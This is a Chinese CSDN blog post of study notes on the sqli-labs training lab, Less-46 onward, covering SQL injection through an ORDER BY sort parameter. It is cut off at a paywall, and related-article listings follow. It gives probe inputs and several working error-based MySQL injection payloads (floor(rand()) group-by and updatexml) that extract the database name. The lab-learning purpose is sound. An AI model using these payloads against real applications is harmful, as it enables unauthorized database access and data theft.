sqli-labs学习笔记(十三)less 46-53 order by 后的注入

最新推荐文章于 2021-07-14 10:23:43 发布
最新推荐文章于 2021-07-14 10:23:43 发布
阅读量1k 收藏
点赞数 3
分类专栏: cyber security 文章标签: 数据库 mysql 网络安全 sql注入 sqlilabs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44604541/article/details/108692229
版权
本文介绍了sqli-labs中关于ORDER BY语句的SQL注入学习,包括报错型和盲注型两种方式,涉及整型和字符型数据。通过实验学习了如何利用ORDER BY后面的参数进行注入,例如利用布尔类型、rand()函数、报错注入、延时注入和procedure analyse参数。
摘要由CSDN通过智能技术生成

前言

继续学习sqli-labs
本篇是less 46-53

Less - 46: GET - Error based - Numeric - ORDER BY CLAUSE 报错型 - order by 注入 - 整型

在这里插入图片描述
按要求输入sort
发现表格顺序不同
在这里插入图片描述
在这里插入图片描述
这关往后都是order by语句与limit语句的相关注入
他们的 URL 中通常都会有sort和limit两个参数

测试漏洞

?sort=1 desc--+
?sort=1 asc--+

在这里插入图片描述
在这里插入图片描述
分别显示升序和降序的表格
说明此处是注入点

order by 后的数字可以作为一个注入点
也就是构造 order by 后的一个语句
让该语句执行结果为一个数

尝试

?sort=right(version(),1)--+
?sort=left(version(),1)--+

在这里插入图片描述
在这里插入图片描述
没有报错,但是 right 和 left 结果都一样
说明数字没有起作用

考虑布尔类型
也可以用报错注入和延时注入

  • ?sort=(select ······)
  • ?sort=1 and (select ······)
  • ?sort=rand(······)
基于报错注入

爆库

?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select group_concat(database()) limit 0,1),0x3a,0x3a,floor(rand()*2)))
?sort=(select 1 from (select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a) b)
?sort=UpdateXml(1,concat(0x7e,database(),0x7e),1)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

爆表

?sort=(select 1 from (select count(*),concat_ws('-',(
最低0.47元/天 解锁文章
思源湖的鱼
关注
专栏目录
sqlilabs靶场记录排序注入(九)
wanan的博客
10-09 695
sqlilabs靶场记录排序注入(九)
SQLi-LABS Page-3 (order by injections) Less-46-Less-53
weixin_30485799的博客
06-27 120
关于order by 注入原理讲解 注入原理 1. 测试 ?sort=1 desc--+?sort=1 asc--+显示结果不同,说明可以注入 desc是 descend 降序意思 asc 是 ascend 升序意思 可利用 order by 后的一些参数进行注入 2. 利用 1)order by 后的数字可以作为一个注入order by 后的数字可以作为一个注入点。也...
在一个limit注入习题下的知识集合
zezai3010的博客
12-13 1207
一、mysql里面的几个函数的解释 (一) Select 查询官方解释 1. SELECT  2. [ALL | DISTINCT | DISTINCTROW ]   3. [HIGH_PRIORITY]   4. [STRAIGHT_JOIN]   5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]   6. [
sql注入详解 一文了解sql注入所有常见方法
闵行小鱼塘
09-22 3391
刷完了sqli-labs,对sql注入有了些许认识,在此做个小结与记录
sqli-labs学习笔记(五)less 15-16 post盲注
闵行小鱼塘
09-08 571
继续学习sqli-labs,本篇是less15-16
sqli-labs学习笔记(七)less 18-22 header注入
闵行小鱼塘
09-12 402
继续学习sqli-labs,本篇是less18-22
sqli-labs学习笔记(三)less 7-10 导出文件和盲注
闵行小鱼塘
09-05 550
继续学习sqli-labs,本篇是less7-10
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 360
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
SQL注入漏洞底层原理解析(注入点原理)
Ciyaso的博客
07-14 784
sql注入时一种常见的漏洞,大部分人只知道sql注入漏洞是由于sql语句过滤不够严谨所导致的,但是为什么过滤不严谨就会造成sql注入,对于这个问题,我们今天就来深挖一下sql注入产生的根本原因-----深入研究注入点。 我再本地创建了两个表(命名和数据没有任何含义纯属瞎编的) Mysql版本5.1.60 第一个表:news,可以理解为存储新闻信息的表,是理论上允许客户访问使用的数据库,里面并不存储敏感信息。 第二个表:ps,用于账号管理的表,里面有管理员账号,有敏感信息。 一、SELECT注入 PS:在
[SQL注入][Stacked injection]sqli-labs学习记录(38-53关)
Y4tacker的博客
08-11 6068
学习记录前置知识堆叠注入第38关 ------ 简单堆叠注入第39关 ------ 数字型+堆叠注入第40关 ------ 闭合`')`+堆叠注入第41关 ------ 盲注+堆叠注入第42关 ------ POST型+堆叠注入第43关 ------ 类似42关(堆叠注入)第44关 ------ 前置知识 堆叠注入 本来想写的,但是网上一堆堆就不班门弄斧了,看师傅们的吧 堆叠注入详解 第38关 ------ 简单堆叠注入 经过简单的测试我们推测sql语句为: SELECT * FROM users WHER
CTF解题-网安实验室(注入关)
道阻且长,行则将至。
09-03 4069
万能密码 【题目环境】 最简单的SQL注入 分值: 100 Tips:题目里有简单提示 通关地址 【解题过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2006
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
Mysql 数据库 优化利器 PROCEDURE ANALYSE
czh0423的专栏
04-10 1036
PROCEDURE ANALYSE 通过分析select查询结果对现有的表的每一列给出优化的建议。 PROCEDURE ANALYSE的语法如下: SELECT … FROM … WHERE … PROCEDURE ANALYSE([max_elements,[max_memory]]) max_elements (默认值256) analyze查找每一列不同值时所需关注的最大不同值的数量.
Sqli-labs之Less:46-49
→_→
05-16 1243
Less-49 基于错误_GET_数字型_排序注入 这一关首先要说一下的是,在前面的关卡中我们大多是使用 id这个参数来获取到正常的页面,但在这几关中我们要使用 sort 这个参数,因为后台源代码这样设置了 那么接下来我们看一下正常的页面: 我们看到了正常的页面,从中我们也发现了数字的不同,页面给我们呈现出的账号表格中的顺序是不同的,那么这就是我们这几关要说的知识点。 ...
sqli-Labs————less-46order by 之后的注入
Fly_鹏程万里
05-21 1363
前言从这一关开始将会介绍一下order by相关的注入内容。Less-46源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o...
MySQLMySQL 执行 PROCEDURE ANALYSE 报错 ERROR 1064 (42000)
九师兄
07-10 1190
1.背景 MySQL 8.0.19 执行命令报错 mysql> SELECT * FROM sales PROCEDURE ANALYSE(10, 2000)\G; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'PROCEDURE ANAL
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值